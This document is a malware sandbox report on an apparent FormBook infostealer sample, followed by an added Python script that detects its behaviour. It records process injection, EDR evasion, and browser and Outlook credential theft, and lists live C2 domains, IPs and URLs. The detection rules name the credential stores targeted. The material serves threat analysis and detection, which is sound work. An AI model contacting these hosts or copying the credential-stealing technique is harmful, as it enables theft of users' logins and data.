            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_02F7096E mov eax, dword ptr fs:[00000030h]1_2_02F7096E
            Source: C:\Users\user\Desktop\rP0n___87004354.exe | Code function: 0_2_007C81D4 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity | 0_2_007C81D4
            Source: C:\Users\user\Desktop\rP0n___87004354.exe | Code function: 0_2_0079A2D5 SetUnhandledExceptionFilter,UnhandledExceptionFilter | 0_2_0079A2D5
            Source: C:\Users\user\Desktop\rP0n___87004354.exe | Code function: 0_2_0079A2A4 SetUnhandledExceptionFilter | 0_2_0079A2A4

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exe | NtWriteVirtualMemory: Direct from: 0x76F0490C
            Source: C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exe | NtAllocateVirtualMemory: Direct from: 0x76F03C9C
            Source: C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exe | NtClose: Direct from: 0x76F02B6C
            Source: C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exe | NtReadVirtualMemory: Direct from: 0x76F02E8C
            Source: C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exe | NtCreateKey: Direct from: 0x76F02C6C
            Source: C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exe | NtSetInformationThread: Direct from: 0x76F02B4C
            Source: C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exe | NtQueryAttributesFile: Direct from: 0x76F02E6C
            Source: C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exe | NtAllocateVirtualMemory: Direct from: 0x76F048EC
            Source: C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exe | NtQuerySystemInformation: Direct from: 0x76F048CC
            Source: C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exe | NtQueryVolumeInformationFile: Direct from: 0x76F02F2C
            Source: C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exe | NtOpenSection: Direct from: 0x76F02E0C
            Source: C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exe | NtSetInformationThread: Direct from: 0x76EF63F9
            Source: C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exe | NtDeviceIoControlFile: Direct from: 0x76F02AEC
            Source: C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exe | NtAllocateVirtualMemory: Direct from: 0x76F02BEC
            Source: C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exe | NtCreateFile: Direct from: 0x76F02FEC
            Source: C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exe | NtOpenFile: Direct from: 0x76F02DCC
            Source: C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exe | NtQueryInformationToken: Direct from: 0x76F02CAC
            Source: C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exe | NtTerminateThread: Direct from: 0x76F02FCC
            Source: C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exe | NtOpenKeyEx: Direct from: 0x76F02B9C
            Source: C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exe | NtProtectVirtualMemory: Direct from: 0x76F02F9C
            Source: C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exe | NtSetInformationProcess: Direct from: 0x76F02C5C
            Source: C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exe | NtNotifyChangeKey: Direct from: 0x76F03C2C
            Source: C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exe | NtCreateMutant: Direct from: 0x76F035CC
            Source: C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exe | NtWriteVirtualMemory: Direct from: 0x76F02E3C
            Source: C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exe | NtMapViewOfSection: Direct from: 0x76F02D1C
            Source: C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exe | NtResumeThread: Direct from: 0x76F036AC
            Source: C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exe | NtAllocateVirtualMemory: Direct from: 0x76F02BFC
            Source: C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exe | NtReadFile: Direct from: 0x76F02ADC
            Source: C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exe | NtQuerySystemInformation: Direct from: 0x76F02DFC
            Source: C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exe | NtDelayExecution: Direct from: 0x76F02DDC
            Source: C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exe | NtQueryInformationProcess: Direct from: 0x76F02C26
            Source: C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exe | NtResumeThread: Direct from: 0x76F02FBC
            Source: C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exe | NtCreateUserProcess: Direct from: 0x76F0371C
            Source: C:\Users\user\Desktop\rP0n___87004354.exe | Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Windows\SysWOW64\mstsc.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\mstsc.exe | Section loaded: NULL target: C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exe protection: read write
            Source: C:\Windows\SysWOW64\mstsc.exe | Section loaded: NULL target: C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\mstsc.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
            Source: C:\Windows\SysWOW64\mstsc.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\mstsc.exe | Thread register set: target process: 4956
            Source: C:\Windows\SysWOW64\mstsc.exe | Thread APC queued: target process: C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exe
            Source: C:\Users\user\Desktop\rP0n___87004354.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 22F0008
            Source: C:\Users\user\Desktop\rP0n___87004354.exe | Code function: 0_2_007C8A73 LogonUserW | 0_2_007C8A73
            Source: C:\Users\user\Desktop\rP0n___87004354.exe | Code function: 0_2_00773B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW | 0_2_00773B4C
            Source: C:\Users\user\Desktop\rP0n___87004354.exe | Code function: 0_2_00774A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput | 0_2_00774A35
            Source: C:\Users\user\Desktop\rP0n___87004354.exe | Code function: 0_2_007D4CFA mouse_event | 0_2_007D4CFA
            Source: C:\Users\user\Desktop\rP0n___87004354.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\rP0n___87004354.exe"
            Source: C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exe | Process created: C:\Windows\SysWOW64\mstsc.exe "C:\Windows\SysWOW64\mstsc.exe"
            Source: C:\Windows\SysWOW64\mstsc.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\rP0n___87004354.exe | Code function: 0_2_007C81D4 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity | 0_2_007C81D4
            Source: C:\Users\user\Desktop\rP0n___87004354.exe | Code function: 0_2_007D4A08 AllocateAndInitializeSid,CheckTokenMembership,FreeSid | 0_2_007D4A08
            Source: rP0n___87004354.exe | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
            Source: rP0n___87004354.exe, FrywuFHvnDbLo.exe, 00000002.00000002.3547131752.0000000001720000.00000002.00000001.00040000.00000000.sdmp, FrywuFHvnDbLo.exe, 00000002.00000000.1729464301.0000000001720000.00000002.00000001.00040000.00000000.sdmp, FrywuFHvnDbLo.exe, 00000005.00000000.1883081777.0000000001470000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
            Source: FrywuFHvnDbLo.exe, 00000002.00000002.3547131752.0000000001720000.00000002.00000001.00040000.00000000.sdmp, FrywuFHvnDbLo.exe, 00000002.00000000.1729464301.0000000001720000.00000002.00000001.00040000.00000000.sdmp, FrywuFHvnDbLo.exe, 00000005.00000000.1883081777.0000000001470000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
            Source: FrywuFHvnDbLo.exe, 00000002.00000002.3547131752.0000000001720000.00000002.00000001.00040000.00000000.sdmp, FrywuFHvnDbLo.exe, 00000002.00000000.1729464301.0000000001720000.00000002.00000001.00040000.00000000.sdmp, FrywuFHvnDbLo.exe, 00000005.00000000.1883081777.0000000001470000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
            Source: FrywuFHvnDbLo.exe, 00000002.00000002.3547131752.0000000001720000.00000002.00000001.00040000.00000000.sdmp, FrywuFHvnDbLo.exe, 00000002.00000000.1729464301.0000000001720000.00000002.00000001.00040000.00000000.sdmp, FrywuFHvnDbLo.exe, 00000005.00000000.1883081777.0000000001470000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: }Program Manager
            Source: C:\Users\user\Desktop\rP0n___87004354.exe | Code function: 0_2_007987AB cpuid | 0_2_007987AB
            Source: C:\Users\user\Desktop\rP0n___87004354.exe | Code function: 0_2_007A5007 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter | 0_2_007A5007
            Source: C:\Users\user\Desktop\rP0n___87004354.exe | Code function: 0_2_007B215F GetUserNameW | 0_2_007B215F
            Source: C:\Users\user\Desktop\rP0n___87004354.exe | Code function: 0_2_007A40BA __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte | 0_2_007A40BA
            Source: C:\Users\user\Desktop\rP0n___87004354.exeCode function: 0_2_00774AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00774AFE

            Stealing of Sensitive Information

Source: Yara match | File source: 1.2.svchost.exe.2490000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.svchost.exe.2490000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000001.00000002.1812489277.0000000002490000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.3548998319.0000000005260000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1817351860.0000000003250000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.3547541019.00000000041B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1817399152.0000000005E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.3546547268.0000000000160000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.3547479377.00000000029B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.3547465093.00000000055B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\mstsc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
Source: C:\Windows\SysWOW64\mstsc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\mstsc.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Windows\SysWOW64\mstsc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\mstsc.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\mstsc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
Source: C:\Windows\SysWOW64\mstsc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
Source: C:\Windows\SysWOW64\mstsc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Windows\SysWOW64\mstsc.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
Source: rP0n___87004354.exe | Binary or memory string: WIN_81
Source: rP0n___87004354.exe | Binary or memory string: WIN_XP
Source: rP0n___87004354.exe | Binary or memory string: WIN_XPe
Source: rP0n___87004354.exe | Binary or memory string: WIN_VISTA
Source: rP0n___87004354.exe | Binary or memory string: WIN_7
Source: rP0n___87004354.exe | Binary or memory string: WIN_8
Source: rP0n___87004354.exe | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 2USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
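
The process chain recorded above (svchost.exe launched with the sample's own path as its command line, mstsc.exe started by FrywuFHvnDbLo.exe from a randomly named directory under Program Files (x86), mstsc.exe then spawning firefox.exe) and the browser and Outlook credential stores opened by mstsc.exe are the host-side observables a detection engineer would turn into rules. The block below is an added example, not part of the Joe Sandbox report: it encodes those observations as four rules run over a constructed list of Sysmon-style process-creation and file/registry-access events modelled on the report. The expected-parent table, the set of processes allowed to read credential stores and the event schema are assumptions for illustration.

```python
"""Host-based detection of the process chain and credential-store access in this report.

Added example, not part of the Joe Sandbox report. EVENTS is a constructed
Sysmon-style event list modelled on the report's process tree and the files
and registry key mstsc.exe opened; the expected-parent table, the allowed
readers of credential stores and the event schema are assumptions.
"""
import ntpath

SYSTEM_DIRS = {r"c:\windows\system32", r"c:\windows\syswow64"}

# Parents from which these Microsoft binaries are normally started (assumption).
EXPECTED_PARENTS = {"svchost.exe": {"services.exe"}, "mstsc.exe": {"explorer.exe"}}

# A Remote Desktop client has no legitimate reason to spawn a browser (assumption).
UNEXPECTED_CHILDREN = {"mstsc.exe": {"firefox.exe", "chrome.exe", "msedge.exe"}}

# Browser and Outlook credential stores the report shows mstsc.exe opening.
CREDENTIAL_STORES = (
    r"\google\chrome\user data\default\login data",
    r"\google\chrome\user data\default\cookies",
    r"\google\chrome\user data\default\network\cookies",
    r"\google\chrome\user data\default\web data",
    r"\microsoft\edge\user data\default\login data",
    r"\microsoft\edge\user data\default\network\cookies",
    r"\windows messaging subsystem\profiles\outlook",
)
ALLOWED_READERS = {"chrome.exe", "msedge.exe", "outlook.exe"}  # assumption


def first_executable(command_line):
    """Executable that begins a Windows command line, honouring a quoted path."""
    s = command_line.strip()
    if s.startswith('"'):
        end = s.find('"', 1)
        return s[1:end] if end != -1 else s[1:]
    return s.split(" ", 1)[0]


def check_process_create(ev):
    alerts = []
    image = ntpath.basename(ev["image"]).lower()
    parent = ntpath.basename(ev["parent_image"]).lower()
    claimed = ntpath.basename(first_executable(ev["command_line"])).lower()

    # Rule 1: a system binary whose command line names a different executable,
    # as with svchost.exe started with the sample's own path in the report.
    if ntpath.dirname(ev["image"]).lower() in SYSTEM_DIRS and claimed != image:
        alerts.append({"rule": "image_cmdline_mismatch", "image": ev["image"],
                       "detail": f"command line names {claimed}"})
    # Rule 2: system binary started by an unexpected parent.
    if image in EXPECTED_PARENTS and parent not in EXPECTED_PARENTS[image]:
        alerts.append({"rule": "unexpected_parent", "image": ev["image"],
                       "detail": f"parent {parent}"})
    # Rule 3: RDP client spawning a browser.
    if parent in UNEXPECTED_CHILDREN and image in UNEXPECTED_CHILDREN[parent]:
        alerts.append({"rule": "unexpected_child", "image": ev["parent_image"],
                       "detail": f"spawned {image}"})
    return alerts


def check_access(ev):
    """Rule 4: anything but the owning application reading a credential store."""
    image = ntpath.basename(ev["image"]).lower()
    target = ev["target"].lower()
    if image not in ALLOWED_READERS and any(s in target for s in CREDENTIAL_STORES):
        return [{"rule": "credential_store_access", "image": ev["image"], "detail": ev["target"]}]
    return []


def analyze(events):
    """Run all rules over the events and return the alerts raised."""
    alerts = []
    for ev in events:
        if ev["type"] == "process_create":
            alerts.extend(check_process_create(ev))
        elif ev["type"] in ("file_open", "registry_open"):
            alerts.extend(check_access(ev))
    return alerts


SAMPLE = r"C:\Users\user\Desktop\rP0n___87004354.exe"
INJECTOR = r"C:\Program Files (x86)\pUUbSwisXmuavNzKkjrwUevzwvLSscEwaszVCCnH\FrywuFHvnDbLo.exe"
MSTSC = r"C:\Windows\SysWOW64\mstsc.exe"
EVENTS = [  # constructed, modelled on the report
    {"type": "process_create", "image": SAMPLE, "parent_image": r"C:\Windows\explorer.exe",
     "command_line": f'"{SAMPLE}"'},
    {"type": "process_create", "image": r"C:\Windows\SysWOW64\svchost.exe",
     "parent_image": SAMPLE, "command_line": f'"{SAMPLE}"'},
    {"type": "process_create", "image": MSTSC, "parent_image": INJECTOR, "command_line": f'"{MSTSC}"'},
    {"type": "process_create", "image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "parent_image": MSTSC, "command_line": r'"C:\Program Files\Mozilla Firefox\Firefox.exe"'},
    {"type": "file_open", "image": MSTSC,
     "target": r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    {"type": "registry_open", "image": MSTSC,
     "target": r"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook"},
    # Benign controls: the browser reading its own store, svchost.exe from services.exe.
    {"type": "file_open", "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "target": r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    {"type": "process_create", "image": r"C:\Windows\System32\svchost.exe",
     "parent_image": r"C:\Windows\System32\services.exe",
     "command_line": r"C:\Windows\System32\svchost.exe -k netsvcs -p"},
]

if __name__ == "__main__":
    for a in analyze(EVENTS):
        print(f"{a['rule']:24} {a['image']}  ({a['detail']})")
```

Run stand-alone, the block raises six alerts on the constructed events and none on the two benign controls. Rule 1 is the most portable of the four: a Microsoft binary in System32 or SysWOW64 whose command line names some other executable is the trace that process hollowing leaves in creation telemetry, independent of which binary the loader picks.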

            Remote Access Functionality

Source: Yara match | File source: 1.2.svchost.exe.2490000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.svchost.exe.2490000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000001.00000002.1812489277.0000000002490000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.3548998319.0000000005260000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1817351860.0000000003250000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.3547541019.00000000041B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.1817399152.0000000005E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.3546547268.0000000000160000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.3547479377.00000000029B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.3547465093.00000000055B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\rP0n___87004354.exe | Code function 0_2_007E6399: socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket
Source: C:\Users\user\Desktop\rP0n___87004354.exe | Code function 0_2_007E685D: socket,WSAGetLastError,bind,WSAGetLastError,closesocket
MITRE ATT&CK Matrix (rebuilt per tactic from the flattened 14-column table). Digits in brackets are the report's signature-count badges exactly as extracted; a multi-digit string may be several adjacent badges run together. Techniques without a badge are the matrix's default placeholders and matched no signature.

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies; Network Topology
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless; Malvertising
Initial Access: [2] Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
Execution: [2] Native API; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job; Command and Scripting Interpreter
Persistence: [1] DLL Side-Loading; [2] Valid Accounts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job; At
Privilege Escalation: [1] Exploitation for Privilege Escalation; [1] Abuse Elevation Control Mechanism; [1] DLL Side-Loading; [2] Valid Accounts; [21] Access Token Manipulation; [412] Process Injection; Startup Items; Scheduled Task/Job; At
Defense Evasion: [1] Disable or Modify Tools; [1] Deobfuscate/Decode Files or Information; [1] Abuse Elevation Control Mechanism; [3] Obfuscated Files or Information; [1] DLL Side-Loading; [2] Valid Accounts; [2] Virtualization/Sandbox Evasion; [21] Access Token Manipulation; [412] Process Injection
Credential Access: [1] OS Credential Dumping; [21] Input Capture; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow
Discovery: [2] System Time Discovery; [1] Account Discovery; [2] File and Directory Discovery; [116] System Information Discovery; [151] Security Software Discovery; [2] Virtualization/Sandbox Evasion; [3] Process Discovery; [11] Application Window Discovery; [1] System Owner/User Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services; Direct Cloud VM Connections
Collection: [1] Archive Collected Data; [1] Data from Local System; [1] Email Collection; [21] Input Capture; [3] Clipboard Data; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged
Command and Control: [4] Ingress Tool Transfer; [1] Encrypted Channel; [4] Non-Application Layer Protocol; [4] Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Impact: [1] System Shutdown/Reboot; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement; Internal Defacement
Behavior Graph ID: 1518123 | Sample: rP0n___87004354.exe | Start date: 25/09/2024 | Architecture: WINDOWS | Score: 100

Sample-level nodes: DNS/IP: www.heldhold.xyz, www.useanecdotenow.tech, 16 other IPs or domains. Signatures: Suricata IDS alerts for network traffic; Malicious sample detected (through community Yara rule); Antivirus / Scanner detection for submitted sample; 5 other signatures. Performs DNS queries to domains with low reputation (www.heldhold.xyz).

Process chain:
1. rP0n___87004354.exe started. Signatures: Binary is likely a compiled AutoIt script file; Writes to foreign memory regions; Maps a DLL or memory area into another process; Switches to a custom stack to bypass stack traces.
2. svchost.exe started by rP0n___87004354.exe. Signature: Maps a DLL or memory area into another process.
3. FrywuFHvnDbLo.exe injected from svchost.exe. Signature: Found direct / indirect Syscall (likely to bypass EDR).
4. mstsc.exe started by FrywuFHvnDbLo.exe. Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures.
5. FrywuFHvnDbLo.exe injected from mstsc.exe. Signature: Found direct / indirect Syscall (likely to bypass EDR). Network: www.heldhold.xyz 67.223.117.189, ports 49750, 49751, 49752, VIMRO-AS15189US, United States; www.mfgarage.net 85.153.138.113, ports 49766, 49767, 49768, TELECABLESpainES, Turkey; 6 other IPs or domains.
6. firefox.exe started by mstsc.exe.

Source | Detection | Scanner | Label
rP0n___87004354.exe | 74% | ReversingLabs | Win32.Backdoor.FormBook
rP0n___87004354.exe | 100% | Avira | HEUR/AGEN.1319375
rP0n___87004354.exe | 100% | Joe Sandbox ML |
No Antivirus matches
No Antivirus matches
No Antivirus matches
URL reputation lookups at analysis time. The C2-path URLs rated "safe" here are the same ones the analysis itself marks malicious in the URL table below; a reputation verdict of "safe" only means the scanner had no record of the URL.

Source | Detection | Scanner | Label
https://duckduckgo.com/chrome_newtab | 0% | URL Reputation | safe
https://duckduckgo.com/ac/?q= | 0% | URL Reputation | safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | URL Reputation | safe
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | 0% | URL Reputation | safe
https://www.ecosia.org/newtab/ | 0% | URL Reputation | safe
https://ac.ecosia.org/autocomplete?q= | 0% | URL Reputation | safe
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | 0% | URL Reputation | safe
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | 0% | URL Reputation | safe
http://www.linkwave.cloud/al6z/ | 0% | Avira URL Cloud | safe
http://www.dalong.site/v2c3/ | 0% | Avira URL Cloud | safe
http://www.ultraleap.net/8pln/?PR_xXrA=T9/DtY4QstE2hf5O1waUB+I/eJ4Uv9cvfz5cQjr/yHb6PkgoDrQz8TZtAEENUqwsBaW/Syqgj8DnNvIHzYG9oL792aB/FoBSyK+aeSTPR1nXcfMqNX8wInY=&n0=mTk8u4lhzbnhVh | 0% | Avira URL Cloud | safe
